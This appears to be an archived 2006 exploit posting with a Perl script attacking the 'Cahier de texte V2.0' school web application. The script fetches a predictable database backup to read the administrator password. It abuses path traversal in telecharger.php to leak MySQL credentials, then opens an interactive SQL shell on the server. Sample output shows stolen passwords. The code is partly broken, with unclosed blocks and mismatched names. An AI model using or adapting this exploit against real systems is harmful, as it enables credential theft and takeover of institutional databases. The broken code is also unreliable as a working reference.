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Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit
来源:acid-root.new.fr 作者:DarkFig 发布时间:2006-11-27  

# ============
# Affected.scr..: Cahier de texte V2.0
# Poc.ID........: 15061124
# Type..........: Predictable backup filename, Source disclosure
# Risk.level....: High
# Conditions....: register_globals = on
# Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_de_texte/
# Poc.link......: acid-root.new.fr/poc/15061124.txt
# Credits.......: DarkFig
# Note..........: Coded for fun
# ==========
# header> Cahier de texte V2.0 SQL Code Execution Exploit
# header> -----------------------------------------------
# status> Searching the backup file
# sploit> Administrateur::epolas
# status> Downloading database informations
# sploit> Host::sql.mysite.com
# sploit> Database::cahier_de_texte
# sploit> Username::root
# sploit> Password::toor
# status> Contacting the mysql server
# _mysql> select * from cdt_prof
# +-------+--------------+---------+
# |ID_prof|nom_prof |passe |
# +-------+--------------+---------+
# | 1|Administrateur|epolas |
# | 2|DarkFig |crazypass|
# +-------+--------------+---------+
# 2 rows processed
# _mysql> exit
use MySQL;
use Getopt::Long;
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Request::Common;

print STDOUT "\nheader> Cahier de texte V2.0 SQL Code Execution Exploit";
print STDOUT "\nheader> ", "-" x 47, "\n";

$opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);

if(!$host) {
print STDOUT "header> Usage: ./xXx.pl --host=[www] --path=[/] [Opts]\n";
print STDOUT "header> [Opts] --proxh=[ip] --proxu=[user] --proxp=[pwd]\n";

$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";

$ua = LWP::UserAgent->new();
$ua->proxy(['http'] => $proxh) if $proxh;
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

# First vulnerability
# ===================
# The backup's filename is allways the same
# If the file is protected by a .htaccess file,
# use the source disclosure vulnerability to get it.
# There is also all members passwords but here we
# just take the administrator password.

print STDOUT "status> Searching the backup file\n";
$re = GET $host.$path.'administration/dump.sql';
$res = $ua->request($re);

if($res->as_string !~ /HTTP\/1.(x|1) 404 Not Found/) {
if($res->content =~ /INSERT INTO cdt_prof VALUES\(1, 'Administrateur', '(.*?)'\);/) {
print STDOUT "sploit> Administrateur::$1\n";}} else {
print STDOUT "sploit> None backup found\n";}

# Second vulnerability
# ====================
# Source disclosure in administration/telecharger.php

print STDOUT "status> Downloading database informations\n";
$ch = '../Connections/conn_cahier_de_texte.php&Fichier_a_telecharger=';
$re = GET $host.$path."administration/telecharger.php?chemin=$ch";
$res = ($ua->request($re))->content;

if($res =~ /\$hostname_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
)\$password_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)/) {

$mhost=$3; $database=$8; $username=$13; $password=$18;
print STDOUT "sploit> Host::$mhost\nsploit> Database::$database\n";
print STDOUT "sploit> Username::$username\nsploit> Password::$password\n";} else {
print STDOUT "sploit> Exploit failed\n";

if($mhost =~ /^(localhost|127\.0\.0\.1)$/ or !$mhost) {
print STDOUT "sploit> MySQL server is localhost\n";

# Third step
# ==========
# Trying a connection with the MySQL server

print STDOUT "status> Contacting the mysql server\n";
$dbh = Mysql->connect($mhost, $database, $username, $password);

while() {
print STDOUT "_mysql> ";
chomp($query = <STDIN>);

$query =~ /^(exit||quit)$/ ? exit(0) : 0x2727;
$res = $dbh->query($query) ? $dbh->query($query) : $dbh->errmsg();
$res != $dbh->errmsg() ? print $res->as_string : 0x2727;

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